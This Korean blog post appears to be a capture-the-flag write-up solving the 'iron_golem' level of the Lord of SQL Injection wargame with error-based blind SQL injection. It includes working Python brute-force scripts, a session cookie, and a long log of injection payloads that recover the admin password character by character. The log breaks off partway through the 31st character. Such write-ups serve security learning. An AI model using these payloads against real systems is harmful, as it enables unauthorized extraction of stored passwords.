Oh! JUN
[Lord Of SQL Injection] 21번(error blind sql) 본문
문제풀이/Lord of SQL Injection
[Lord Of SQL Injection] 21번(error blind sql)
Kwon Oh! JUN 2022. 2. 12. 23:41query : select id from prob_iron_golem where id='admin' and pw=''
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(mysqli_error($db)) exit(mysqli_error($db));
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("iron_golem");
highlight_file(__FILE__);
기존과 다른게 있다면
if(mysqli_error($db)) exit(mysqli_error($db));error을 발생시켜서 T/F를 구분해서 원하는 값을 받아내는것이다.
import requests
import string
url = "https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"
cookie = dict(PHPSESSID="qui93ljl9i3egjuv279au3d4qm")
for i in range(1,100):
param = "?pw='or id='admin' and if(length(pw)="+str(i)+",(select 1 union select 2), 1)%23"
len_result = url+param
response = requests.get(len_result, cookies=cookie)
print(len_result)
if response.text.find("Subquery") >= 0:
print("password :"+str(i))
breakpw의 길이를 알아내틑 코드이다.
if(조건, 참, 거짓)
length(pw)의 길이가 참이면 (select 1 union select 2) 서브쿼리 오류를 발생시켜서 참인지 알 수 있다.
*이전코드와 다르게 response.text.find("Subquery") >=0: 크거나 같은 등호 표시를 해준 이유는 오류가 발생할 때 화면에 출력되는 텍스트가 오류 문자 밖에 없기 때문이다. 그렇기 때문에 오류 문자 "Subquery"의 첫번째 문자 "S"는 0번째에 해당하기 때문에 >0 사용하면 ?ubquery로 인식되기 때문에 원하는 값을 얻을 수 없다.
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=1,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=2,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=3,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=4,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=5,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=6,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=7,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=8,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=9,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=10,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=11,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=12,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=13,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=14,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=15,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=16,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=17,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=18,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=19,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=20,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=21,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=22,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=23,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=24,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=25,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=26,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=27,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=28,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=29,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=30,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=31,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=32,(select 1 union select 2), 1)%23
password :32패스워드 길이 : 32
패스워드 값을 알아보면
import requests
import string
url = "https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"
cookie = dict(PHPSESSID="qh6cd97grivfurvhcaobv2sqjt")
asc = string.digits+string.ascii_letters
print(asc)
result=""
for i in range(1,33):
for j in asc:
param = "?pw='or id='admin' and if(right(left(pw,"+str(i)+"),1)='"+str(j)+"',(select 1 union select 2),1)%23"
#param = "?pw='or id='admin' and if(ord(substr(pw,"+str(i)+",1))="+str(ord(j))+",(select 1 union select 2), 1)%23"
print(param)
res_url = url+param
response = requests.get(res_url, cookies=cookie)
if response.text.find("Subquery")>=0:
print(str(i)+"번째 패스워드 :"+j)
result+=j
break
print("pw :"+result)param = "?pw='or id='admin' and if(right(left(pw,"+str(i)+"),1)='"+str(j)+"',(select 1 union select 2),1)%23"
#param = "?pw='or id='admin' and if(ord(substr(pw,"+str(i)+",1))="+str(ord(j))+",(select 1 union select 2), 1)%23"| pw | str(j) |
| "문자열" | "문자열" |
| "문자열" → 아스키코드 | "문자열" → 아스키코드 |
*문자열을 아스키코드로 바꿔서 코딩을 짰었는데 문득 든 생각이 굳이 아스키코드로 안바꿔도 될텐데 해서 해보니까 안되길래 찾아보니까 right(left(...))=A가 아닌 right(left(...))='A' 문자열 표시를 해줘야 했다. 그래서 right(left(pw,"+str(i)+"),1) 작은 따음표를 붙여줬더니 정상적으로 작동했다.
?pw='or id='admin' and if(right(left(pw,1),1)='0',(select 1 union select 2),1)%23
1번째 패스워드 :0
?pw='or id='admin' and if(right(left(pw,2),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='6',(select 1 union select 2),1)%23
2번째 패스워드 :6
?pw='or id='admin' and if(right(left(pw,3),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='b',(select 1 union select 2),1)%23
3번째 패스워드 :b
?pw='or id='admin' and if(right(left(pw,4),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='5',(select 1 union select 2),1)%23
4번째 패스워드 :5
?pw='or id='admin' and if(right(left(pw,5),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='a',(select 1 union select 2),1)%23
5번째 패스워드 :a
?pw='or id='admin' and if(right(left(pw,6),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='6',(select 1 union select 2),1)%23
6번째 패스워드 :6
?pw='or id='admin' and if(right(left(pw,7),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='c',(select 1 union select 2),1)%23
7번째 패스워드 :c
?pw='or id='admin' and if(right(left(pw,8),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,8),1)='1',(select 1 union select 2),1)%23
8번째 패스워드 :1
?pw='or id='admin' and if(right(left(pw,9),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='6',(select 1 union select 2),1)%23
9번째 패스워드 :6
?pw='or id='admin' and if(right(left(pw,10),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='c',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='d',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='e',(select 1 union select 2),1)%23
10번째 패스워드 :e
?pw='or id='admin' and if(right(left(pw,11),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='8',(select 1 union select 2),1)%23
11번째 패스워드 :8
?pw='or id='admin' and if(right(left(pw,12),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='8',(select 1 union select 2),1)%23
12번째 패스워드 :8
?pw='or id='admin' and if(right(left(pw,13),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,13),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,13),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,13),1)='3',(select 1 union select 2),1)%23
13번째 패스워드 :3
?pw='or id='admin' and if(right(left(pw,14),1)='0',(select 1 union select 2),1)%23
14번째 패스워드 :0
?pw='or id='admin' and if(right(left(pw,15),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,15),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,15),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,15),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,15),1)='4',(select 1 union select 2),1)%23
16번째 패스워드 :7
?pw='or id='admin' and if(right(left(pw,17),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='5',(select 1 union select 2),1)%23
17번째 패스워드 :5
?pw='or id='admin' and if(right(left(pw,18),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='c',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='d',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='e',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='f',(select 1 union select 2),1)%23
18번째 패스워드 :f
?pw='or id='admin' and if(right(left(pw,19),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='9',(select 1 union select 2),1)%23
19번째 패스워드 :9
?pw='or id='admin' and if(right(left(pw,20),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='8',(select 1 union select 2),1)%23
20번째 패스워드 :8
?pw='or id='admin' and if(right(left(pw,21),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,21),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,21),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,21),1)='3',(select 1 union select 2),1)%23
21번째 패스워드 :3
?pw='or id='admin' and if(right(left(pw,22),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='c',(select 1 union select 2),1)%23
22번째 패스워드 :c
?pw='or id='admin' and if(right(left(pw,23),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='c',(select 1 union select 2),1)%23
23번째 패스워드 :c
?pw='or id='admin' and if(right(left(pw,24),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,24),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,24),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,24),1)='3',(select 1 union select 2),1)%23
24번째 패스워드 :3
?pw='or id='admin' and if(right(left(pw,25),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='a',(select 1 union select 2),1)%23
25번째 패스워드 :a
?pw='or id='admin' and if(right(left(pw,26),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='8',(select 1 union select 2),1)%23
26번째 패스워드 :8
?pw='or id='admin' and if(right(left(pw,27),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,27),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,27),1)='2',(select 1 union select 2),1)%23
27번째 패스워드 :2
?pw='or id='admin' and if(right(left(pw,28),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='5',(select 1 union select 2),1)%23
28번째 패스워드 :5
?pw='or id='admin' and if(right(left(pw,29),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='c',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='d',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='e',(select 1 union select 2),1)%23
29번째 패스워드 :e
?pw='or id='admin' and if(right(left(pw,30),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='c',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='d',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='e',(select 1 union select 2),1)%23
30번째 패스워드 :e
?pw='or id='admin' and if(right(left(pw,31),1)='0',(select 1 union select 2),1)%23
